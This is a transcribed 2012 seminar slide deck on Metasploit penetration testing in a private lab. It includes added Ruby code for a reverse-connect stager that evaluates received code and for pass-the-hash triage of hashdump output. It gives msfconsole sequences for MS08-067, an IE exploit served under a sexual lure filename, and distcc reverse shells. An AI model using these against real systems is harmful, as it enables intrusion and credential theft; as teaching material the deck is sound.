Pentest with Metasploit
![Page 1: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/1.jpg)
Penetration Testing with Metasploit
Presented by Syarif
Seminar IT Security: Safe The System
Sumedang, April 29 2012, STMIK Sumedang
![Page 2: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/2.jpg)
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track Overview
• Metasploit Basics & Meterpreter
• DEMO :)
![Page 3: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/3.jpg)
Whoami
• geek & Pentester
• infosec trouble maker
• InfoSec enthusiast
• CyberCrime investigator
• Lecturer & Engineer
![Page 4: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/4.jpg)
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)
• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
![Page 5: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/5.jpg)
What’s Penetration Testing
• A method to evaluate the security of a computer system / network
• Attacking an IT system the way a ‘hacker’ would
• Find security holes ( weaknesses )
• Bypass security mechanisms
• Compromise an organization’s IT system security
Must have permission from the IT system owner !
Illegal activity puts you in jail.
![Page 6: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/6.jpg)
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
![Page 7: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/7.jpg)
Pentest Phases
1. Information Gathering
2. Vulnerability Analysis
3. Exploitation
4. Post Exploitation
5. Reporting
![Page 8: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/8.jpg)
<< back|track overview
• Let’s Watch the Video :)
![Page 9: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/9.jpg)
<< back|track overview
• The Most Advanced Linux Security Distribution
• Open Source & Always will be
• Developed for Security Professionals
• Real World Pentesting Tools
![Page 10: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/10.jpg)
<< back|track overview
![Page 11: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/11.jpg)
<< back|track overview
![Page 12: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/12.jpg)
What’s Metasploit ?
• Not just a tool, but an entire framework *1)
• An open source platform for writing security tools and exploits *2)
• Easily build attack vectors by combining its exploits, payloads and encoders
• Create and execute more advanced attacks
• Ruby based
![Page 13: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/13.jpg)
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
![Page 14: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/14.jpg)
MSFconsole
![Page 15: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/15.jpg)
MSFcli
![Page 16: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/16.jpg)
Metasploit Terminology
• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
• Payload : code that we want the target system to execute ( a few commands to be run on the target system ) *1)
• Shellcode : a set of instructions used as the payload when exploitation occurs *1)
• Module : a piece of software that can be used by Metasploit *1)
• Listener : a component that waits for an incoming connection *1)
![Page 17: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/17.jpg)
How does exploitation work ?
1. The attacker sends exploit + payload to the vulnerable server
2. The exploit runs, then the payload runs
3. Upload / download data over the resulting session
![Page 18: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/18.jpg)
Traditional Pentest vs Metasploit
Traditional Pentest :
• Public exploit gathering
• Change offsets
• Replace shellcode
Metasploit for Pentest :
• Load Metasploit
• Choose the target OS
• Use exploit
• Set payload
• Execute
![Page 19: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/19.jpg)
Meterpreter
• Used as the payload after a vulnerability is exploited *1)
• Improves post exploitation
![Page 20: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/20.jpg)
Meterpreter
1. Exploit a vulnerability
2. Select Meterpreter as the payload
3. Meterpreter shell
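The exploit → payload → session flow on the “How does exploitation work” slide and the Meterpreter flow above both hide one detail worth seeing in code: windows/meterpreter/reverse_tcp is two pieces, a tiny reverse_tcp stager that connects back to LHOST:LPORT and the Meterpreter stage that the listener sends it. The real stager reads a 4-byte little-endian length, then that many bytes of stage, and jumps into it. The Ruby below is an added model of that exchange, not framework code: the listener and stager run in one process over 127.0.0.1, the stage is a constructed snippet of Ruby that the stager evaluates in place of a Meterpreter DLL, and the sysinfo/getuid replies are made up for the demo.

```ruby
require 'socket'

# Constructed "stage": what the listener delivers once the stager connects.
# It defines a small command loop, the stand-in for a Meterpreter session.
# Single-quoted heredoc: the #{...} are evaluated on the stager side, not here.
STAGE = <<~'RUBY'
  # Runs inside the stager with `sock` bound to the connection.
  loop do
    cmd = sock.gets&.chomp
    break if cmd.nil? || cmd == "exit"
    reply = case cmd
            when "sysinfo" then "#{RUBY_PLATFORM} pid=#{Process.pid}"
            when "getuid"  then "uid=#{Process.uid}"
            else "unknown command: #{cmd}"
            end
    sock.puts(reply)
  end
RUBY

# Listener side: what `exploit` starts for you when PAYLOAD is a reverse_tcp
# payload (or what exploit/multi/handler does explicitly).
class ReverseTcpHandler
  attr_reader :port

  def initialize(lhost = "127.0.0.1", lport = 0)
    @server = TCPServer.new(lhost, lport)
    @port = @server.addr[1]   # lport 0 picks an ephemeral port for the demo
  end

  # Wait for one stager to call back, send it the stage, then drive the
  # resulting session with the given commands. Returns the replies.
  def handle(stage, commands)
    sock = @server.accept
    # Real stager protocol: 4-byte little-endian length ("V"), then the stage.
    sock.write([stage.bytesize].pack("V") + stage)
    replies = commands.map { |c| sock.puts(c); sock.gets.chomp }
    sock.puts("exit")
    sock.close
    replies
  end

  def close
    @server.close
  end
end

# Payload (stager) side: what runs on the victim after the exploit fires.
def reverse_tcp_stager(lhost, lport)
  sock = TCPSocket.new(lhost, lport)
  stage_len = sock.read(4).unpack1("V")
  stage = sock.read(stage_len)
  # The real stager jumps into freshly received machine code; this model
  # evaluates Ruby in a binding that exposes `sock` to the stage.
  binding.eval(stage)
ensure
  sock&.close
end

# Runs both sides and returns the session replies (attacker's view).
def demo
  handler = ReverseTcpHandler.new
  victim = Thread.new { reverse_tcp_stager("127.0.0.1", handler.port) }
  replies = handler.handle(STAGE, %w[sysinfo getuid whoami])
  victim.join
  handler.close
  replies
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

The listener never has to know which exploit delivered the stager; that is why a single LHOST/LPORT pair and one handler serve every exploit in this deck, and why the stager is the only part that must survive the size limits of the exploited bug.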
![Page 21: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/21.jpg)
Meterpreter command
![Page 22: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/22.jpg)
Meterpreter command
![Page 23: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/23.jpg)
Meterpreter command
![Page 24: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/24.jpg)
Meterpreter command
![Page 25: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/25.jpg)
Meterpreter command
![Page 26: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/26.jpg)
Pentest Scenario
• Attacker machine → vulnerable OS targets, all on VMware
• * : Ubuntu 8.04 Metasploitable
![Page 27: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/27.jpg)
OS in the Lab
• BackTrack 5 R2 ( attacker ) : IP address 172.16.240.143
• Windows XP SP2 : IP address 172.16.240.129
• Windows 2003 Server : IP address 172.16.240.141
• Windows 7 : IP address 172.16.240.142
• Ubuntu Linux 8.04 ( Metasploitable ) : IP address 172.16.240.144
![Page 28: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/28.jpg)
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
![Page 29: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/29.jpg)
Windows XP Post Exploitation
• msf exploit(ms08_067_netapi) > sessions -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
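Once hashdump has run, the next decision is what to do with the lines it prints. The Ruby below is an added example, not from the slides or from Metasploit: it parses the pwdump-style user:RID:LM:NTLM::: lines that hashdump emits, uses the well-known hashes of the empty password to flag blank-password accounts and hosts that still store LM hashes, and prints the LM:NT pair that exploit/windows/smb/psexec accepts as SMBPass for pass-the-hash. The sample dump is constructed: the Administrator line uses the textbook hashes of the string “password”, the HelpAssistant NT hash is made up.

```ruby
# Sentinel hashes of the empty password, as stored by Windows.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of ""
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""

Account = Struct.new(:user, :rid, :lm, :ntlm) do
  def blank_password?
    ntlm == EMPTY_NT
  end

  # Anything but the empty sentinel means the host still stores LM hashes:
  # two uppercased 7-character halves that crack in minutes.
  def lm_stored?
    lm != EMPTY_LM
  end

  # The "LM:NT" form that psexec takes as SMBPass; no cracking required.
  def smbpass
    "#{lm}:#{ntlm}"
  end
end

# Parse hashdump output; lines that are not user:RID:LM:NT::: are skipped.
def parse_hashdump(text)
  text.each_line.map do |line|
    user, rid, lm, ntlm = line.strip.split(":", -1)
    next unless rid =~ /\A\d+\z/ && lm =~ /\A\h{32}\z/ && ntlm =~ /\A\h{32}\z/
    Account.new(user, rid.to_i, lm.downcase, ntlm.downcase)
  end.compact
end

# Blank-password accounts are excluded from the pass-the-hash list because
# XP and later reject network logons with a blank password by default.
def triage(accounts)
  {
    blank:     accounts.select(&:blank_password?).map(&:user),
    lm_stored: accounts.select(&:lm_stored?).map(&:user),
    pth_ready: accounts.reject(&:blank_password?).map { |a| [a.user, a.smbpass] }.to_h,
  }
end

# Constructed sample in hashdump format (illustrative values only).
SAMPLE = <<~DUMP
  Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:aad3b435b51404eeaad3b435b51404ee:0c2d5e1c7a4b3f9d8e7a6b5c4d3e2f10:::
  [*] not a hash line, e.g. console chatter
DUMP

if __FILE__ == $PROGRAM_NAME
  triage(parse_hashdump(SAMPLE)).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Paste the hashdump output into SAMPLE (or read it from a file) and the lm_stored list tells you which hosts need the LM-storage finding in the report, independently of whether any password is ever cracked.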
![Page 30: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/30.jpg)
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.141
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
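The XP and 2003 walkthroughs are the same module with a different RHOST, which is exactly the repetition a msfconsole resource script removes. The Ruby below is an added example, not from the slides or from Metasploit: it emits a resource script for the lab hosts listed earlier (run it with msfconsole -r lab.rc) and refuses to emit anything for a target outside an authorized range, which is the “must have permission” rule from the start of the deck turned into a check. The 172.16.240.0/24 scope, the per-target LPORT numbering and the exploit -j -z flags are my choices.

```ruby
require 'ipaddr'

# Assumed rules of engagement: only the lab network is in scope.
AUTHORIZED_SCOPE = ["172.16.240.0/24"].map { |cidr| IPAddr.new(cidr) }

def in_scope?(host)
  ip = IPAddr.new(host)
  AUTHORIZED_SCOPE.any? { |net| net.include?(ip) }
rescue IPAddr::InvalidAddressError
  false
end

# targets: array of { name:, host: }. Returns the text of the .rc file.
def build_rc(lhost, targets, mod: "exploit/windows/smb/ms08_067_netapi",
             payload: "windows/meterpreter/reverse_tcp", first_lport: 4444)
  out_of_scope = targets.map { |t| t[:host] }.reject { |h| in_scope?(h) }
  unless out_of_scope.empty?
    raise ArgumentError, "refusing to target out-of-scope host(s): #{out_of_scope.join(', ')}"
  end

  lines = ["use #{mod}", "set PAYLOAD #{payload}", "set LHOST #{lhost}"]
  targets.each_with_index do |t, i|
    lines << "# #{t[:name]}"
    lines << "set RHOST #{t[:host]}"
    # Each job binds its own reverse handler; two on one LPORT would collide.
    lines << "set LPORT #{first_lport + i}"
    # -j runs the exploit as a background job on a copy of the module and
    # -z skips interacting with the session, so the next target can be set now.
    lines << "exploit -j -z"
  end
  lines << "sessions -l"
  lines.join("\n") + "\n"
end

# Lab hosts from the deck; BackTrack (.143) is the attacker.
LAB = [
  { name: "Windows XP SP2",      host: "172.16.240.129" },
  { name: "Windows 2003 Server", host: "172.16.240.141" },
].freeze

# Usage: ruby lab_rc.rb > lab.rc && msfconsole -r lab.rc
puts build_rc("172.16.240.143", LAB) if __FILE__ == $PROGRAM_NAME
```

Because the script raises before printing a single line, a typo that turns .141 into a host outside the lab range fails loudly instead of sending an SMB exploit to someone else's server.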
![Page 31: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/31.jpg)
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim opens the URL http://172.16.240.143:80/miyabi-naked.avi in a vulnerable version of Internet Explorer. This is a client-side exploit: nothing happens until the browser fetches the page, and the session calls back to LHOST on port 443.
![Page 32: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/32.jpg)
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
![Page 33: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/33.jpg)
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.240.144
• set lhost 172.16.240.143
• exploit
![Page 35: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/35.jpg)
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
![Page 36: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/36.jpg)
References
• 1. Metasploit: The Penetration Tester’s Guide. David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines